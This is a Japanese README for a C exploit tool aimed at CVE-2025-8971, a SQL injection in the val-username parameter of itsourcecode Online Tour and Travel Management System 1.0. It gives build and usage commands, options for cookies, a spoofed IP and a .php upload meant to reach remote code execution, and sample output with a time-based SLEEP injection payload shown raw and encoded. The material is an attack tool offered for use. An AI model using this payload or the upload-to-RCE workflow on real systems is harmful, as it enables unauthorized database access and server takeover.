
itsourcecode Online Tour and Travel Management System 1.0 における SQLインジェクション
Author: Byte Reaper
このエクスプロイトは、CVE-2025-8971、itsourcecode Online Tour and Travel Management System 1.0におけるSQLインジェクションの脆弱性を対象としています。 脆弱性は /admin/operations/travellers.php に存在し、val-username パラメータを介してリモートから悪用可能です。
エクスプロイトは、標的URLに対して細工されたHTTP POSTリクエストを送信します。
ペイロードはエンコードされ、val-username に注入されます。
オプションのファイルアップロード(.php または画像)を使用して、リモートコード実行を実現できます。
スクリプトは応答を検証し、ペイロードが正常に実行されたかどうかを確認します。
GCC compiler (gcc)
Linux x86_64
ibcurl
gcc script.c argparse.c -o CVE-2025-8971 -lcurl
./CVE-2025-8971 -u http://<target> -v [verbose mode]
-h, --help ヘルプメッセージ
-u, --url ターゲットURL(ベースURL)
-c, --cookies クッキーファイル
-i, --ip 偽装IP(Hostリクエスト)
-f, --file ファイルアップロード(.php / 画像)
-v, --verbose 冗長モード
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....
MIT License